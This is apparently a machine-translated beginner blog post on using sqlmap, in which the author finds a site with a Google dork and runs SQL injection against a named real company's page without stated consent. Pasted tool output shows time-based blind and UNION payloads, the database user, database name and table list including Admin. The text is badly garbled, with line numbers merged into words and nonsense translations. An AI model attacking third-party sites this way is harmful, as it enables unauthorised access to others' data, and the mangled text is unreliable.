SQLMAP Beginner Injection

What's a sqlmap?

1 Sqlmap is a open source penetration testing tool that automates the2 process of detecting and exploiting SQL injection flaws and taking over of3Database servers. It comes with a powerful detection engine,many niche4Features forThe ultimate penetration tester and a broadRangeof Switches5Lasting from database fingerprinting,Over data fetching from the6Database7To accessing the underlyingfile systemand executing commands on the8OperatingsystemVia Out-of-band connections.

Sqlmap is an open source automatic detection and discovery of SQL injection vulnerabilities and a tool to take down the database server. It has a powerful probing engine, and many features support probing servers and taking down database servers.

* * In short, Sqlmap is a pick-up station tool.

Two installations.

Python 2.6 or 2.7, Mark is just these two major versions. SQLMAP installation can be used with Easy_install or Git clone from the repository.

Sam Hunt Station

Google hack Ah, inurl:\ ". php\?id=

Let's try the second one. Www.cowinbio.com/about/index. php? id=1

　Open Dry

1Blind (heavy query) 'injectable2[10:07:47] [INFO] testing ' Generic UNION query (NULL)-1 to Columns '3 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech4 ique tests as there in least one other (potential) technique found5 [10:07:49] [INFO] Target URL appears to is UNION injectable with 2 columns6 [10:07:49] [WARNING] combined union/error-based SQL injection case found on Col7 mn 1. Sqlmap'll try to find another column with better characteristics8[10:07:49] [INFO] GET parameter ' id ' is ' Generic UNION query (NULL)-1 to 20C9Lumns 'injectableTenGET parameter ' ID 'is vulnerable. Want to keep testing the others (if One )? [y/n] N A Sqlmap identified the following injection point (s) and a total of 2626 HTTP (s) - Requests: - --- the Parameter:id (GET) -type:and/or time-based Blind

And then

1          _2___ ___| |_____ ___ ___ {1.0-dev-c6d4217}3|_ -| .     | | |. '| . |4 |___|_  |_|_|_|_|__,| _|5       |_|   |_| Http://sqlmap.org6 7 [!] legal disclaimer:usage of Sqlmap for attacking targets without prior Mutu8Consent is illegal. It is the end user 's responsibility to obey all APPLICABL9Local, state and federal laws.developers assume no liability and is not respTenSible forAny misuse or damage caused One  A[*] starting at 10:15:04 -  -You provided ' MySQL ' asA back-EndDbmsBut from a past scan information on T theTarget URL Sqlmap assumes the back-EndDBMS is ' MySQL <5.0.11 '. DoYou really -Ant to force the back-EndDBMS value? [y/N] y -[10:15:22] [INFO] testing connection to the target URL -[10:15:22] [WARNING] There is a DBMS error found in the HTTP response body WHI + could interfere with the results of the tests -[10:15:22] [INFO] CheckingifThe target isprotectedBy some kind of waf/ips/ + S ASqlmap resumed the following injection point (s) from stored session: at--- -Parameter:ID (GET) -type:and/or Time-based Blind -Title:MySQL<= 5.0.11 and Time-based blind (heavy query) -Payload:id=1 and 5889=benchmark (5000000,MD5(0x6d6c765a)) -  inType:UNION Query -Title:generic UNION Query (NULL)-2Columns topayload:id=-2036 UNION all SELECT CONCAT (0x716a767a71,0x674971454552444a7 +7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU --- - the--- *[10:15:23] [INFO] TestingMySQL $[10:15:23] [INFO] ConfirmingMySQLPanax Notoginseng[10:15:23] [INFO] the back-EndDBMS isMySQL -Web Application technology:php 5.6.9 theback-EndDbms:MySQL< 5.0.0 +[10:15:23] [INFO] Fetching CurrentUser A  CurrentUser: ' [email protected] '

And after that,

         _ ___ ___| |_____ ___ ___ {1.0-dev-c6d4217}|_ -| .     | | |. '| . ||  ___|_  |_|_|_|_|__,|      _|           |_|   |_| Http://sqlmap.org[!] Legal disclaimer:usage of Sqlmap for attacking targets without prior mutua consent are illegal. It is the end user‘s responsibility to obey all applicablelocal, state and federal laws.developers assume no liability and is not resposible forAny misuse or damage caused by this program[*] starting at 10:16:44[10:16:44] [INFO] testing connection to the target url[10:16:44] [WARNING] There is a DBMS error found in the HTTP response body whic could interfere with the results of the tests[< /c0>10:16:44] [INFO] CheckingifThe target isprotectedBy some kind of waf/ips/Issqlmap resumed the following injection point (s) from stored session:---Parameter:ID (GET) Type: and/or Time-based Blind Title:MySQL<= 5.0.11 and Time-based blind (heavy query) Payload: Id=1 and 5889=benchmark (5000000,MD5(0x6d6c765a)) Type:UNION Query Title: Generic UNION Query (NULL)-2Columns Payload: id=-2036 UNION all SELECT CONCAT (0x716a767a71,0x674971454552444a797526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d, 0x7162766271),NUL-- ----[10:16:45] [INFO] TestingMySQL[10:16:45] [INFO] ConfirmingMySQL[10:16:45] [INFO] the back-EndDBMS isMySQLWeb Application Technology: PHP 5.6.9 Back-EndDbms:MySQL< 5.0.0[10:16:45] [INFO] Fetching CurrentDatabase CurrentDatabase: ' CW '

1 Database: cw2 [3 tables]3 +---------+4 | Admin   |  5 | News    |  6 | Product | 7 +---------+

Let's get here. After all, it's blogging. I do not further in-depth, I hope you crossing also do not try further.

In addition friendship reminds this station, you are not too safe.

Solemnly declare the above article I original, reproduced please indicate the source. Small three here thanked ~ ~.

SQLMAP Beginner Injection